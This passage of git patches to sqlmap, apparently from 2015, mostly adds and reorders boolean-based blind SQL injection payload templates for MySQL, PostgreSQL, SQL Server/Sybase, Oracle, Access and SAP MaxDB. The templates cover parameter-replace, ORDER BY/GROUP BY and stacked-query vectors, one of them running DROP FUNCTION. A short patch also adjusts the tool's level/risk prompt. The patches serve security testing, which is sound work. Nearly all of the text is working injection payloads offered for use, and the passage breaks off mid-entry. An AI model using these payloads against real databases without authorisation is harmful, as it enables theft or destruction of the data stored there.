+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
@@ -298,10 +313,29 @@ Tag: <test>
         </response>
     </test>
 
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>MAKE_SET([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -318,12 +352,31 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
+        <title>MySQL boolean-based blind - Parameter replace (ELT)</title>
         <stype>1</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
+        <vector>ELT([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
         <vector>ELT([INFERENCE],[ORIGVALUE])</vector>
         <request>
             <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
@@ -336,10 +389,29 @@ Tag: <test>
         </details>
     </test>
 
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (bool*int)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>([INFERENCE])*[RANDNUM]</vector>
+        <request>
+            <payload>([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
+        </request>
+        <response>
+            <comparison>([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -358,7 +430,7 @@ Tag: <test>
     <test>
         <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>1</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -378,7 +450,7 @@ Tag: <test>
     <test>
         <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -395,18 +467,76 @@ Tag: <test>
     </test>
 
     <test>
-        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
+        <title>PostgreSQL boolean-based blind - Parameter replace</title>
         <stype>1</stype>
         <level>3</level>
-        <risk>2</risk>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
         <request>
-            <payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
         </response>
         <details>
             <dbms>PostgreSQL</dbms>
@@ -496,7 +626,7 @@ Tag: <test>
     <test>
         <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -512,7 +642,7 @@ Tag: <test>
     <test>
         <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -532,6 +662,26 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
         <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
         <request>
             <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
@@ -552,6 +702,25 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
         <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
             <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
@@ -564,6 +733,70 @@ Tag: <test>
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!-- It exclusively works with ORDER BY -->
+    <test>
+        <title>PostgreSQL boolean-based blind - ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <!--
+         TODO: this would work for GROUP BY too if sqlmap did not enclose string-based [ORIGVALUE] with single quotes, but then other payloads would break.
+               It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is
+    -->
+    <test>
+        <!-- <title>PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses (GENERATE_SERIES - original value)</title> -->
+        <title>PostgreSQL boolean-based blind - ORDER BY clauses (GENERATE_SERIES - original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <!-- <clause>2,3</clause> -->
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
         <stype>1</stype>
@@ -571,6 +804,27 @@ Tag: <test>
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
         <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
             <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
@@ -592,6 +846,25 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
         <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
         <request>
             <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
@@ -611,6 +884,25 @@ Tag: <test>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <vector>,IIF([INFERENCE],1,1/0)</vector>
+        <request>
+            <payload>,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
+        </request>
+        <response>
+            <comparison>,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
         <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
         <request>
             <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
@@ -622,24 +914,102 @@ Tag: <test>
             <dbms>Microsoft Access</dbms>
         </details>
     </test>
-    <!-- TODO: check against SAP MaxDB -->
-    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
 
-    <!-- Stacked conditional-error blind queries tests -->
     <test>
-        <title>PostgreSQL stacked conditional-error blind queries</title>
+        <title>SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses</title>
         <stype>1</stype>
         <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>2</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>
         <request>
-            <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
+            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+        <request>
+            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+
+    <!-- Boolean-based blind tests - Stacked queries -->
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Stacked queries</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
             <comment>--</comment>
         </request>
         <response>
-            <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
         </response>
         <details>
             <dbms>PostgreSQL</dbms>
@@ -647,19 +1017,19 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
         <stype>1</stype>
-        <level>3</level>
-        <risk>0</risk>
+        <level>2</level>
+        <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
-        <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
+        <vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
         <request>
-            <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
+            <payload>;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
             <comment>--</comment>
         </request>
         <response>
-            <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
+            <comparison>;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
         </response>
         <details>
             <dbms>Microsoft SQL Server</dbms>
@@ -667,5 +1037,5 @@ Tag: <test>
             <os>Windows</os>
         </details>
     </test>
-    <!-- End of stacked conditional-error blind queries tests -->
+    <!-- End of boolean-based blind tests - Stacked queries -->
 </root>

From 201b605f9bc1ad68d9ca128cc2154ae91875a4b1 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 10:21:44 +0000
Subject: [PATCH 347/492] Minor fix and consistency: do not ask to include all
 tests if level and risk are at the max settings already

---
 lib/controller/checks.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index f636568a0..65f264077 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -111,12 +111,12 @@ def checkSqlInjection(place, parameter, value):
                         msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
                         kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
 
-                    if kb.extendTests is None:
+                    if kb.extendTests is None and (conf.level < 5 or conf.risk < 3):
                         _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
                         msg = "do you want to include all tests for '%s' " % _
                         msg += "extending provided level (%d) and risk (%s) values? [Y/n]" % (conf.level, conf.risk)
                         kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
-            elif kb.extendTests is None and conf.level < 5 and conf.risk < 3:
+            elif kb.extendTests is None and (conf.level < 5 or conf.risk < 3):
                 msg = "do you want to include all tests for '%s' " % conf.dbms
                 msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
                 kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms])

From 5b65d2e133367b030bc377614f6888587769f9fa Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 11:34:16 +0000
Subject: [PATCH 348/492] more consistency of boolean blind payloads - issue
 #1169

---
 xml/payloads/01_boolean_blind.xml | 380 ++++++++++++++++++++++++++++--
 1 file changed, 357 insertions(+), 23 deletions(-)

diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
index dc7008767..4b5fe3901 100644
--- a/xml/payloads/01_boolean_blind.xml
+++ b/xml/payloads/01_boolean_blind.xml
@@ -263,7 +263,7 @@ Tag: <test>
     <test>
         <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -278,6 +278,119 @@ Tag: <test>
             <dbms>MySQL</dbms>
         </details>
     </test>
+
+    <test>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR MAKE_SET([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ELT([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR ELT([INFERENCE],[RANDNUM])</vector>
+        <request>
+            <payload>OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
+        </request>
+        <response>
+            <comparison>OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
